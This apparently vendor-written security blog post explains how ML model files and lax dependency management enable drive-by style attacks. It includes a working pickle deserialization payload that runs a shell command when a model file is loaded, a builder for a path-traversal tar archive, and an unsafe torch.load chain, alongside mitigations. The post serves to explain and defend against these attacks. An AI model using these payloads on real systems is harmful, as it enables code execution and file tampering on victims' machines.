Machine learning (ML) has seen rapid adoption across industries, enabling advancements in automation, analytics, and artificial intelligence. However, the rapid growth of ML has also introduced new security concerns. One particularly alarming issue is the way ML models are becoming an attack vector for a familiar but seemingly outdated exploit: drive-by attacks. In the era of Java and Flash vulnerabilities, drive-by attacks were a common way to compromise systems, often requiring nothing more than a visit to a malicious website to unknowingly trigger an exploit. Now, the same approach is making a resurgence through ML dependencies and models.
Unlike traditional software development, ML dependency management operates in a chaotic and loosely controlled ecosystem. ML engineers frequently pull large numbers of packages and libraries into their development environments as part of experimentation, without carefully scoping them to specific projects, and the emphasis on speed and experimentation routinely wins out over dependency hygiene.
This creates a perfect storm of unmonitored, out-of-date libraries, many of which contain vulnerabilities that are rarely scrutinized: because they are treated as experimentation and development dependencies, they are not held to the same standard as production dependencies.
Many ML dependencies, especially those regarded as development libraries, contain vulnerabilities capable of Arbitrary Code Execution (ACE). Traditionally, these vulnerabilities posed a limited threat unless an application's code explicitly invoked the affected functions, so most security measures focus on Software Composition Analysis (SCA) scans of the applications consuming these dependencies. The ML ecosystem, however, challenges this traditional model.
One of the most concerning aspects of this attack vector is that victims would rarely, if ever, realize that a model or a Hugging Face repository contains a malicious payload. Attackers can embed payloads in model files, weights, configuration files, binary files, and Python scripts. Loading a compromised model is as simple as downloading a file and calling the library's .load() method, and many libraries allow entire repositories to be loaded with a single command. Because payloads can be obfuscated within model files, spotting a malicious model by hand is nearly impossible, making this an especially insidious form of attack.
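To make the mechanics concrete, here is a minimal, hypothetical sketch of why a single load call is enough. It uses plain pickle rather than any particular framework's format; the file name and shell command are placeholders for illustration only.

```python
import os
import pickle

# Hypothetical demo: many legacy model formats are pickle-based, and
# unpickling runs code chosen by whoever wrote the file.
class MaliciousPayload:
    def __reduce__(self):
        # Called automatically during pickle.load(); a real payload would do
        # far more than echo a message.
        return (os.system, ("echo 'payload executed on model load'",))

# "Attacker" side: the payload is saved as an innocuous-looking model file.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# "Victim" side: simply loading the "model" executes the embedded command.
with open("model.pkl", "rb") as f:
    model = pickle.load(f)
```

Frameworks whose serialization formats are pickle-compatible inherit exactly this behavior, which is why loading an untrusted model file can be equivalent to running untrusted code.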
A real-world example of this was discovered by a huntr security researcher, highlighting the risks posed by malicious models. The vulnerability exists in the download_model_with_test_data function, which does not adequately prevent malicious tar files from performing path traversal attacks. An attacker can use a crafted archive to overwrite arbitrary files on the victim's system, compromising both integrity and availability.
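The sketch below is not the ONNX project's actual code; it only illustrates, under hypothetical names, the unsafe extraction pattern that this class of path traversal relies on, alongside one possible guard.

```python
import io
import os
import tarfile

def build_malicious_tar(tar_path: str, payload: bytes) -> None:
    # Attacker side: a member whose name climbs out of the extraction dir.
    with tarfile.open(tar_path, "w:gz") as tar:
        info = tarfile.TarInfo(name="../../overwritten_file.txt")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))

def unsafe_extract(tar_path: str, dest: str) -> None:
    # Vulnerable pattern: member names are trusted as-is.
    with tarfile.open(tar_path, "r:gz") as tar:
        tar.extractall(dest)  # "../../" entries land outside dest

def safe_extract(tar_path: str, dest: str) -> None:
    # Mitigation: reject any member that resolves outside the destination.
    dest_root = os.path.realpath(dest)
    with tarfile.open(tar_path, "r:gz") as tar:
        for member in tar.getmembers():
            target = os.path.realpath(os.path.join(dest, member.name))
            if not target.startswith(dest_root + os.sep):
                raise RuntimeError(f"Blocked path traversal: {member.name}")
        tar.extractall(dest)
```

Newer Python releases also add a filter argument to extractall that can reject such entries, but environments pinned to older interpreters never benefit from it.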
This vulnerability lives in the ONNX framework, and the affected function is trivially importable, making it a significant risk when dealing with unverified ML models. The growing consumption of third-party ML models, combined with lax dependency management, compounds that risk. Attackers can exploit it in a new type of attack chain: publish a poisoned model or repository on a public hub, wait for an engineer to download it, and let the act of loading it execute the embedded payload through a vulnerable dependency, as sketched below.
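A minimal sketch of that chain, assuming the huggingface_hub and torch packages; the repository id and checkpoint name below are placeholders, not real artifacts.

```python
from huggingface_hub import snapshot_download
import torch

# Step 1: an engineer pulls an entire, unverified repository with one call.
local_dir = snapshot_download(repo_id="some-org/quantized-llm-demo")

# Step 2: loading the checkpoint deserializes attacker-controlled bytes.
# With pickle-based formats, this step alone can execute embedded code.
state = torch.load(f"{local_dir}/pytorch_model.bin", weights_only=False)
```

Nothing in this flow looks unusual to the engineer running it, which is exactly what makes the pattern so effective.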
This mirrors the drive-by download attacks of the past, where visiting a malicious website with an outdated version of Java or Flash could silently compromise a workstation.
To defend against this new attack vector, organizations and ML engineers must adopt stronger security practices in dependency management and model verification.
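On the model-verification side, here is a minimal sketch of two such habits, assuming the huggingface_hub and safetensors packages; the repository id, commit hash, and file name are placeholders.

```python
from huggingface_hub import snapshot_download
from safetensors.torch import load_file

# Pin the exact revision (commit hash) so the artifact cannot silently change
# between the security review and the download.
local_dir = snapshot_download(
    repo_id="some-org/approved-model",
    revision="0123456789abcdef0123456789abcdef01234567",
)

# Prefer weight-only formats such as safetensors over pickle-based files:
# they carry tensors, not executable objects.
weights = load_file(f"{local_dir}/model.safetensors")
```

Pinning revisions keeps the reviewed artifact and the downloaded artifact identical, and weight-only formats remove the deserialization-equals-execution problem for the weights file itself.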
The parallels between ML-based drive-by attacks and the notorious Java/Flash drive-bys highlight a critical blind spot in modern cybersecurity. As ML continues to evolve, so too must the security practices surrounding it. Recognizing ML models as potential attack vectors and strengthening dependency security measures will be essential in mitigating these threats before they escalate into widespread exploitation. The past has already shown us what happens when we ignore the risks of unmanaged dependencies—now, it's time to apply those lessons to the ML landscape.
Protect AI is ready to assist in tackling these risks. Get in touch to explore existing and future solutions designed to safeguard ML environments against emerging threats.